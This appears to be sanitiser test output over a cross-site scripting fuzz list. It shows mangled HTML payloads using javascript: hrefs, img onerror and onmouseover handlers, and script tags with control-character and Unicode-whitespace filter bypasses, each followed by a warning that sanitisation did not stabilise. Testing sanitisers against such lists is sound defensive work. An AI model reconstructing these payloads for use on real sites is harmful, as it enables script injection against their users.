=a href=#]x1Ajavascript;javascript;alert(74)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x1Ajavascript;javascript;alert(74)# id=#fuzzelement1#@test=0a@
=a href=#]x00javascript;javascript;alert(75)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x00javascript;javascript;alert(75)# id=#fuzzelement1#@test=0a@
=a href=#]x10javascript;javascript;alert(76)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x10javascript;javascript;alert(76)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]x82javascript;javascript;alert(77)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]x82javascript;javascript;alert(77)# id=#fuzzelement1#@test=0a@
=a href=#]x20javascript;javascript;alert(78)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x20javascript;javascript;alert(78)# id=#fuzzelement1#@test=0a@
=a href=#]x13javascript;javascript;alert(79)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x13javascript;javascript;alert(79)# id=#fuzzelement1#@test=0a@
=a href=#]x09javascript;javascript;alert(80)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x09javascript;javascript;alert(80)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]x8Ajavascript;javascript;alert(81)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]x8Ajavascript;javascript;alert(81)# id=#fuzzelement1#@test=0a@
=a href=#]x14javascript;javascript;alert(82)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x14javascript;javascript;alert(82)# id=#fuzzelement1#@test=0a@
=a href=#]x19javascript;javascript;alert(83)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x19javascript;javascript;alert(83)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]xAFjavascript;javascript;alert(84)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]xAFjavascript;javascript;alert(84)# id=#fuzzelement1#@test=0a@
=a href=#]x1Fjavascript;javascript;alert(85)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x1Fjavascript;javascript;alert(85)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]x81javascript;javascript;alert(86)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]x81javascript;javascript;alert(86)# id=#fuzzelement1#@test=0a@
=a href=#]x1Djavascript;javascript;alert(87)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x1Djavascript;javascript;alert(87)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]x87javascript;javascript;alert(88)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]x87javascript;javascript;alert(88)# id=#fuzzelement1#@test=0a@
=a href=#]x07javascript;javascript;alert(89)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x07javascript;javascript;alert(89)# id=#fuzzelement1#@test=0a@
=a href=#]xE1]x9A]x80javascript;javascript;alert(90)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE1]x9A]x80javascript;javascript;alert(90)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]x83javascript;javascript;alert(91)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]x83javascript;javascript;alert(91)# id=#fuzzelement1#@test=0a@
=a href=#]x04javascript;javascript;alert(92)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x04javascript;javascript;alert(92)# id=#fuzzelement1#@test=0a@
=a href=#]x01javascript;javascript;alert(93)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x01javascript;javascript;alert(93)# id=#fuzzelement1#@test=0a@
=a href=#]x08javascript;javascript;alert(94)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x08javascript;javascript;alert(94)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]x84javascript;javascript;alert(95)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]x84javascript;javascript;alert(95)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]x86javascript;javascript;alert(96)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]x86javascript;javascript;alert(96)# id=#fuzzelement1#@test=0a@
=a href=#]xE3]x80]x80javascript;javascript;alert(97)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE3]x80]x80javascript;javascript;alert(97)# id=#fuzzelement1#@test=0a@
=a href=#]x12javascript;javascript;alert(98)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x12javascript;javascript;alert(98)# id=#fuzzelement1#@test=0a@
=a href=#]x0Djavascript;javascript;alert(99)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x0Djavascript;javascript;alert(99)# id=#fuzzelement1#@test=0a@
=a href=#]x0Ajavascript;javascript;alert(100)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x0Ajavascript;javascript;alert(100)# id=#fuzzelement1#@test=0a@
=a href=#]x0Cjavascript;javascript;alert(101)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x0Cjavascript;javascript;alert(101)# id=#fuzzelement1#@test=0a@
=a href=#]x15javascript;javascript;alert(102)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x15javascript;javascript;alert(102)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]xA8javascript;javascript;alert(103)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]xA8javascript;javascript;alert(103)# id=#fuzzelement1#@test=0a@
=a href=#]x16javascript;javascript;alert(104)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x16javascript;javascript;alert(104)# id=#fuzzelement1#@test=0a@
=a href=#]x02javascript;javascript;alert(105)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x02javascript;javascript;alert(105)# id=#fuzzelement1#@test=0a@
=a href=#]x1Bjavascript;javascript;alert(106)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x1Bjavascript;javascript;alert(106)# id=#fuzzelement1#@test=0a@
=a href=#]x06javascript;javascript;alert(107)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x06javascript;javascript;alert(107)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]xA9javascript;javascript;alert(108)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]xA9javascript;javascript;alert(108)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x80]x85javascript;javascript;alert(109)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x80]x85javascript;javascript;alert(109)# id=#fuzzelement1#@test=0a@
=a href=#]x1Ejavascript;javascript;alert(110)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x1Ejavascript;javascript;alert(110)# id=#fuzzelement1#@test=0a@
=a href=#]xE2]x81]x9Fjavascript;javascript;alert(111)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]xE2]x81]x9Fjavascript;javascript;alert(111)# id=#fuzzelement1#@test=0a@
=a href=#]x1Cjavascript;javascript;alert(112)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#]x1Cjavascript;javascript;alert(112)# id=#fuzzelement1#@test=0a@
=a href=#javascript]x00;javascript;alert(113)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#javascript]x00;javascript;alert(113)# id=#fuzzelement1#@test=0a@
=a href=#javascript]x3A;javascript;alert(114)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#javascript]x3A;javascript;alert(114)# id=#fuzzelement1#@test=0a@
=a href=#javascript]x09;javascript;alert(115)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#javascript]x09;javascript;alert(115)# id=#fuzzelement1#@test=0a@
=a href=#javascript]x0D;javascript;alert(116)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#javascript]x0D;javascript;alert(116)# id=#fuzzelement1#@test=0a@
=a href=#javascript]x0A;javascript;alert(117)# id=#fuzzelement1#?test=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=#javascript]x0A;javascript;alert(117)# id=#fuzzelement1#@test=0a@
`#'?=img src=xxx;x ]x0Aonerror=javascript;alert(118)?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
`#'@=img src=xxx;x ]x0Aonerror=javascript;alert(118)@
`#'?=img src=xxx;x ]x22onerror=javascript;alert(119)?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
`#'@=img src=xxx;x ]x22onerror=javascript;alert(119)@
`#'?=img src=xxx;x ]x0Bonerror=javascript;alert(120)?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
`#'@=img src=xxx;x ]x0Bonerror=javascript;alert(120)@
`#'?=img src=xxx;x ]x0Donerror=javascript;alert(121)?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
`#'@=img src=xxx;x ]x0Donerror=javascript;alert(121)@
`#'?=img src=xxx;x ]x2Fonerror=javascript;alert(122)?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
`#'@=img src=xxx;x ]x2Fonerror=javascript;alert(122)@
`#'?=img src=xxx;x ]x09onerror=javascript;alert(123)?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
`#'@=img src=xxx;x ]x09onerror=javascript;alert(123)@
`#'?=img src=xxx;x ]x0Conerror=javascript;alert(124)?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
`#'@=img src=xxx;x ]x0Conerror=javascript;alert(124)@
`#'?=img src=xxx;x ]x00onerror=javascript;alert(125)?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
`#'@=img src=xxx;x ]x00onerror=javascript;alert(125)@
`#'?=img src=xxx;x ]x27onerror=javascript;alert(126)?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
`#'@=img src=xxx;x ]x27onerror=javascript;alert(126)@
`#'?=img src=xxx;x ]x20onerror=javascript;alert(127)?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
`#'@=img src=xxx;x ]x20onerror=javascript;alert(127)@
#`'?=script?]x3Bjavascript;alert(128)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]x3Bjavascript;alert(128)=0script@
#`'?=script?]x0Djavascript;alert(129)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]x0Djavascript;alert(129)=0script@
#`'?=script?]xEF]xBB]xBFjavascript;alert(130)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xEF]xBB]xBFjavascript;alert(130)=0script@
#`'?=script?]xE2]x80]x81javascript;alert(131)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]x81javascript;alert(131)=0script@
#`'?=script?]xE2]x80]x84javascript;alert(132)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]x84javascript;alert(132)=0script@
#`'?=script?]xE3]x80]x80javascript;alert(133)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE3]x80]x80javascript;alert(133)=0script@
#`'?=script?]x09javascript;alert(134)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]x09javascript;alert(134)=0script@
#`'?=script?]xE2]x80]x89javascript;alert(135)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]x89javascript;alert(135)=0script@
#`'?=script?]xE2]x80]x85javascript;alert(136)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]x85javascript;alert(136)=0script@
#`'?=script?]xE2]x80]x88javascript;alert(137)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]x88javascript;alert(137)=0script@
#`'?=script?]x00javascript;alert(138)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]x00javascript;alert(138)=0script@
#`'?=script?]xE2]x80]xA8javascript;alert(139)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]xA8javascript;alert(139)=0script@
#`'?=script?]xE2]x80]x8Ajavascript;alert(140)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]x8Ajavascript;alert(140)=0script@
#`'?=script?]xE1]x9A]x80javascript;alert(141)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE1]x9A]x80javascript;alert(141)=0script@
#`'?=script?]x0Cjavascript;alert(142)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]x0Cjavascript;alert(142)=0script@
#`'?=script?]x2Bjavascript;alert(143)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]x2Bjavascript;alert(143)=0script@
#`'?=script?]xF0]x90]x96]x9Ajavascript;alert(144)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xF0]x90]x96]x9Ajavascript;alert(144)=0script@
#`'?=script?-javascript;alert(145)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@-javascript;alert(145)=0script@
#`'?=script?]x0Ajavascript;alert(146)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]x0Ajavascript;alert(146)=0script@
#`'?=script?]xE2]x80]xAFjavascript;alert(147)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]xAFjavascript;alert(147)=0script@
#`'?=script?]x7Ejavascript;alert(148)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]x7Ejavascript;alert(148)=0script@
#`'?=script?]xE2]x80]x87javascript;alert(149)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]x87javascript;alert(149)=0script@
#`'?=script?]xE2]x81]x9Fjavascript;alert(150)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x81]x9Fjavascript;alert(150)=0script@
#`'?=script?]xE2]x80]xA9javascript;alert(151)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]xA9javascript;alert(151)=0script@
#`'?=script?]xC2]x85javascript;alert(152)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xC2]x85javascript;alert(152)=0script@
#`'?=script?]xEF]xBF]xAEjavascript;alert(153)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xEF]xBF]xAEjavascript;alert(153)=0script@
#`'?=script?]xE2]x80]x83javascript;alert(154)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]x83javascript;alert(154)=0script@
#`'?=script?]xE2]x80]x8Bjavascript;alert(155)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]x8Bjavascript;alert(155)=0script@
#`'?=script?]xEF]xBF]xBEjavascript;alert(156)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xEF]xBF]xBEjavascript;alert(156)=0script@
#`'?=script?]xE2]x80]x80javascript;alert(157)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]x80javascript;alert(157)=0script@
#`'?=script?]x21javascript;alert(158)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]x21javascript;alert(158)=0script@
#`'?=script?]xE2]x80]x82javascript;alert(159)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]x82javascript;alert(159)=0script@
#`'?=script?]xE2]x80]x86javascript;alert(160)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE2]x80]x86javascript;alert(160)=0script@
#`'?=script?]xE1]xA0]x8Ejavascript;alert(161)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xE1]xA0]x8Ejavascript;alert(161)=0script@
#`'?=script?]x0Bjavascript;alert(162)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]x0Bjavascript;alert(162)=0script@
#`'?=script?]x20javascript;alert(163)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]x20javascript;alert(163)=0script@
#`'?=script?]xC2]xA0javascript;alert(164)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
#`'@=script@]xC2]xA0javascript;alert(164)=0script@
=img ]x00src=x onerror=#alert(165)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img ]x00src=x onerror=#alert(165)#@
=img ]x47src=x onerror=#javascript;alert(166)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img ]x47src=x onerror=#javascript;alert(166)#@
=img ]x11src=x onerror=#javascript;alert(167)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img ]x11src=x onerror=#javascript;alert(167)#@
=img ]x12src=x onerror=#javascript;alert(168)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img ]x12src=x onerror=#javascript;alert(168)#@
=img]x47src=x onerror=#javascript;alert(169)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img]x47src=x onerror=#javascript;alert(169)#@
=img]x10src=x onerror=#javascript;alert(170)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img]x10src=x onerror=#javascript;alert(170)#@
=img]x13src=x onerror=#javascript;alert(171)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img]x13src=x onerror=#javascript;alert(171)#@
=img]x32src=x onerror=#javascript;alert(172)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img]x32src=x onerror=#javascript;alert(172)#@
=img]x47src=x onerror=#javascript;alert(173)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img]x47src=x onerror=#javascript;alert(173)#@
=img]x11src=x onerror=#javascript;alert(174)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img]x11src=x onerror=#javascript;alert(174)#@
=img ]x47src=x onerror=#javascript;alert(175)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img ]x47src=x onerror=#javascript;alert(175)#@
=img ]x34src=x onerror=#javascript;alert(176)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img ]x34src=x onerror=#javascript;alert(176)#@
=img ]x39src=x onerror=#javascript;alert(177)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img ]x39src=x onerror=#javascript;alert(177)#@
=img ]x00src=x onerror=#javascript;alert(178)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img ]x00src=x onerror=#javascript;alert(178)#@
=img src]x09=x onerror=#javascript;alert(179)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src]x09=x onerror=#javascript;alert(179)#@
=img src]x10=x onerror=#javascript;alert(180)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src]x10=x onerror=#javascript;alert(180)#@
=img src]x13=x onerror=#javascript;alert(181)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src]x13=x onerror=#javascript;alert(181)#@
=img src]x32=x onerror=#javascript;alert(182)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src]x32=x onerror=#javascript;alert(182)#@
=img src]x12=x onerror=#javascript;alert(183)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src]x12=x onerror=#javascript;alert(183)#@
=img src]x11=x onerror=#javascript;alert(184)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src]x11=x onerror=#javascript;alert(184)#@
=img src]x00=x onerror=#javascript;alert(185)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src]x00=x onerror=#javascript;alert(185)#@
=img src]x47=x onerror=#javascript;alert(186)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src]x47=x onerror=#javascript;alert(186)#@
=img src=x]x09onerror=#javascript;alert(187)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src=x]x09onerror=#javascript;alert(187)#@
=img src=x]x10onerror=#javascript;alert(188)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src=x]x10onerror=#javascript;alert(188)#@
=img src=x]x11onerror=#javascript;alert(189)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src=x]x11onerror=#javascript;alert(189)#@
=img src=x]x12onerror=#javascript;alert(190)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src=x]x12onerror=#javascript;alert(190)#@
=img src=x]x13onerror=#javascript;alert(191)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src=x]x13onerror=#javascript;alert(191)#@
=img[a][b][c]src[d]=x[e]onerror=[f]#alert(192)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img[a][b][c]src[d]=x[e]onerror=[f]#alert(192)#@
=img src=x onerror=]x09#javascript;alert(193)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src=x onerror=]x09#javascript;alert(193)#@
=img src=x onerror=]x10#javascript;alert(194)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src=x onerror=]x10#javascript;alert(194)#@
=img src=x onerror=]x11#javascript;alert(195)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src=x onerror=]x11#javascript;alert(195)#@
=img src=x onerror=]x12#javascript;alert(196)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src=x onerror=]x12#javascript;alert(196)#@
=img src=x onerror=]x32#javascript;alert(197)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src=x onerror=]x32#javascript;alert(197)#@
=img src=x onerror=]x00#javascript;alert(198)#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src=x onerror=]x00#javascript;alert(198)#@
=a href=java&#5&#6&#7&#8&#11&#12script;javascript;alert(199)?XXX=0a?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=java&#5&#6&#7&#8&#11&#12script;javascript;alert(199)@XXX=0a@
=img src=#x` `=script?javascript;alert(200)=0script?#` `?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src=#x` `=script@javascript;alert(200)=0script@#` `@
=img src onerror 0# '#= alt=javascript;alert(201)00#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=img src onerror 0# '#= alt=javascript;alert(201)00#@
=title onpropertychange=javascript;alert(202)?=0title?=title title=?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=title onpropertychange=javascript;alert(202)@=0title@=title title=@
=a href=http;00foo.bar0#x=`y?=0a?=img alt=#`?=img src=x;x onerror=javascript;alert(203)?=0a?#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=a href=http;00foo.bar0#x=`y@=0a@=img alt=#`@=img src=x;x onerror=javascript;alert(203)@=0a@#@
=!--[if]?=script?javascript;alert(204)=0script --?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=!--[if]@=script@javascript;alert(204)=0script --@
=!--[if=img src=x onerror=javascript;alert(205)00]? --?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=!--[if=img src=x onerror=javascript;alert(205)00]@ --@
=script src=#0]%(jscript)s#?=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=script src=#0]%(jscript)s#@=0script@
=script src=#]]%(jscript)s#?=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=script src=#]]%(jscript)s#@=0script@
=IMG ###?=SCRIPT?alert(#206#)=0SCRIPT?#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=IMG ###@=SCRIPT@alert(#206#)=0SCRIPT@#@
=IMG SRC=javascript;alert(String.fromCharCode(50,48,55))?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=IMG SRC=javascript;alert(String.fromCharCode(50,48,55))@
=IMG SRC=# onmouseover=#alert('208')#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=IMG SRC=# onmouseover=#alert('208')#@
=IMG SRC= onmouseover=#alert('209')#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=IMG SRC= onmouseover=#alert('209')#@
=IMG onmouseover=#alert('210')#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=IMG onmouseover=#alert('210')#@
